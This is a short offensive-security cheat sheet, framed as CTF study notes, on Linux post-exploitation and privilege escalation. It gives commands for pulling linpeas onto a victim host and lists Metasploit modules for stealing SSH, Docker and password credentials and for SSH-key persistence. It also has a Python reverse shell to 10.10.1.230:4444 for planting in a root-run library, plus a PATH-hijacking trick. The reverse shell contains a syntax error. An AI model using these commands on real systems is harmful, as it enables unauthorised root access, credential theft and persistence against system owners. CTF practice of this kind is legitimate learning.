Skip to content

Post Exploit

Educational purposes only

These notes are written strictly for CTF (Capture The Flag) challenges and educational learning. Do not use these techniques against systems you do not own or have explicit written permission to test. The author does not endorse or support any illegal or unauthorized activity.

Post exploit

# Upload linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
# in your local kali
python3 -m http.server 80
# in victim you run, where IP is your vpn IP 
wget http://$IP/linpeas.sh

# Metasploit modules
post/multi/gather/ssh_creds
post/multi/gather/docker_creds
post/linux/gather/hashdump
post/linux/gather/ecryptfs_creds
post/linux/gather/enum_psk
post/linux/gather/enum_xchat
post/linux/gather/phpmyadmin_credsteal
post/linux/gather/pptpd_chap_secrets
post/linux/manage/sshkey_persistence

Privilege escalation

# check SUID binaries then https://gtfobins.github.io/
sudo -l
: ' Sometimes we need to change user first
su jenny    # we enter password of jenny
sudo -l    # we enter password of jenny if asked then run command that doesnt need password to get root'

# check sudo version
sudo -V

# check listening services
ss -ant

# check running processes
ps -eafww
ps -eaufww

# check env
env
printenv
set
declare
typeset
strings /proc/1/environ 

# check scheduled tasks specially root ones
cat /etc/crontab
:' if we can modify the script then do it 
otherwise check if it imports something that we can edit for example: python base64...
locate it : -rwxrwxr-x 1 root valleyAdmin 20382 Mar 13 03:26 /usr/lib/python3.8/base64.py
in this example: users from valleyAdmin group can edit the file
'
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.1.230",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh";"-i"])
# we run it and we'll get root shell 


# Antoher Technique
"""
Find a script running by root and if it calls some linux commands like: id, whoami...
you create an executable file with that name (id, whoami...), then you copy it to the /tmp folder of the victim machine, after that you change the victime machine PATH using: export PATH=/tmp:$PATH
finally you can rerun the script, and it will call the malicious (id, whoami...) we created
"""